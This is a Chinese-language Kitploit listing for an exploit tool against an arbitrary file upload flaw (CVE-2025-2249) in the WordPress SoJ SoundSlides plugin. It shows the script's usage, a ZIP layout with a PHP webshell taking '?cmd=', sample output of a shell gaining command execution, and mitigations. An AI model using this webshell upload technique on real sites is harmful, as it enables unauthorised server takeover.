Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-2249 — WordPress SoJ SoundSlides 插件 <= 1.2.2 存在任意文件上传漏洞 | Kitploit
工具/GitHubGitHub/nxploited/cve-2025-2249
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubnxploited/cve-2025-2249

CVE-2025-2249

WordPress SoJ SoundSlides 插件 <= 1.2.2 存在任意文件上传漏洞

查看仓库
1年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

🔐 WordPress SoJ SoundSlides 插件 <= 1.2.2 - 已认证任意文件上传

⚠️ 免责声明: 此漏洞利用程序仅用于教育和授权测试目的。


📌 漏洞摘要

  • 插件: SoJ SoundSlides
  • 受影响版本: <= 1.2.2
  • 类型: 已认证(贡献者及以上)任意文件上传
  • 补丁状态: ❌ 暂无官方修复

SoJ SoundSlides 插件允许具有贡献者或更高角色的已认证用户上传任意 ZIP 文件。由于缺少验证,攻击者可以上传 PHP webshell,这些 webshell 会被解压并从 web 可访问目录中执行。


💥 影响

拥有有效 WordPress 凭据的攻击者可以:

  • 📦 上传包含 PHP shell 的 ZIP 压缩包
  • 🖥️ 远程执行系统命令(?cmd=)
  • 🔓 未授权控制站点/服务器

🛠️ 用法

root@kitploit:~
usage: CVE-2025-2249.py [-h] -u URL -un USERNAME -p PASSWORD

Exploit for CVE-2025-2249 | WordPress SoJ SoundSlides Plugin # By Nxploited | Khaled ALenazi,

options:
  -h, --help            show this help message and exit
  -u, --url URL         WordPress base URL
  -un, --username USERNAME
                        WordPress username
  -p, --password PASSWORD
                        WordPress password
参数描述
-uWordPress 基础 URL
-unWordPress 用户名
-pWordPress 密码

✨ 功能

  • 🔍 从插件 readme.txt 检查版本
  • 🧰 自动生成包含所需结构和 webshell 的 ZIP 文件
  • 📤 利用存在漏洞的上传端点
  • 💻 通过上传的 shell 进行交互式命令执行

📂 ZIP 文件结构

root@kitploit:~
nxploit/
├── index.html
├── data/
│   └── data.xml
├── audio/
│   └── audio.mp3
└── nxploit.php  ← PHP shell (?cmd=)

🧪 示例

root@kitploit:~
[*] Checking plugin version...
[+] Vulnerable version detected.
[*] Logging in...
[+] Login successful.
[*] Uploading shell...
[*] Shell uploaded: http://target/wp-content/uploads/SoundSlides/nxploit_shell/nxploit.php
> whoami
www-data

🛡️ 缓解措施

  • ❌ 禁用或移除该插件
  • 🧱 应用上传限制
  • 🔍 监控 wp-content/uploads/ 目录中的意外 .php 文件

由 [Nxploited | Khaled ALenazi] 用 ❤️ 构建
用于教育、意识和防御。


🧠 最后说明

安全是每个人的责任。始终进行道德测试、负责任地报告,并保护 Web。

下载工具